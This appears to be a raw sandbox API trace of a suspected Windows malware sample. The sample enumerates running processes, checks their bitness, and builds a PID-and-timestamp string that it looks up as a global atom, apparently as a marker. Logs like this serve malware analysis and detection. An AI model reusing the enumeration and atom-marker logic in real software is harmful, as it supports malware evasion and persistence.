	[0126.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.823] CloseHandle (hObject=0x2dc) returned 1
	[0126.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.824] CloseHandle (hObject=0x2dc) returned 1
	[0126.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.824] CloseHandle (hObject=0x2dc) returned 1
	[0126.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.825] CloseHandle (hObject=0x2dc) returned 1
	[0126.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.825] CloseHandle (hObject=0x2dc) returned 1
	[0126.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.825] CloseHandle (hObject=0x2dc) returned 1
	[0126.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.826] CloseHandle (hObject=0x2dc) returned 1
	[0126.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.826] CloseHandle (hObject=0x2dc) returned 1
	[0126.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.827] CloseHandle (hObject=0x2dc) returned 1
	[0126.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.827] CloseHandle (hObject=0x2dc) returned 1
	[0126.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.827] CloseHandle (hObject=0x2dc) returned 1
	[0126.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.828] CloseHandle (hObject=0x2dc) returned 1
	[0126.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.828] CloseHandle (hObject=0x2dc) returned 1
	[0126.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.829] CloseHandle (hObject=0x2dc) returned 1
	[0126.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.829] CloseHandle (hObject=0x2dc) returned 1
	[0126.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.829] CloseHandle (hObject=0x2dc) returned 1
	[0126.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.830] CloseHandle (hObject=0x2dc) returned 1
	[0126.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.830] CloseHandle (hObject=0x2dc) returned 1
	[0126.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.830] CloseHandle (hObject=0x2dc) returned 1
	[0126.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.831] CloseHandle (hObject=0x2dc) returned 1
	[0126.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.831] CloseHandle (hObject=0x2dc) returned 1
	[0126.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.832] CloseHandle (hObject=0x2dc) returned 1
	[0126.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.832] CloseHandle (hObject=0x2dc) returned 1
	[0126.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.832] CloseHandle (hObject=0x2dc) returned 1
	[0126.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.833] CloseHandle (hObject=0x2dc) returned 1
	[0126.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.833] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetLastError () returned 0x5
	[0126.834] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.834] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.835] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.835] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.836] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetLastError () returned 0x5
	[0126.837] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.837] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.837] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.838] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.838] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.838] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.838] CloseHandle (hObject=0x2dc) returned 1
	[0126.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.838] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.838] CloseHandle (hObject=0x2dc) returned 1
	[0126.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.839] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.839] CloseHandle (hObject=0x2dc) returned 1
	[0126.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.839] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.839] CloseHandle (hObject=0x2dc) returned 1
	[0126.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.839] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.839] CloseHandle (hObject=0x2dc) returned 1
	[0126.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.840] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.840] CloseHandle (hObject=0x2dc) returned 1
	[0126.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
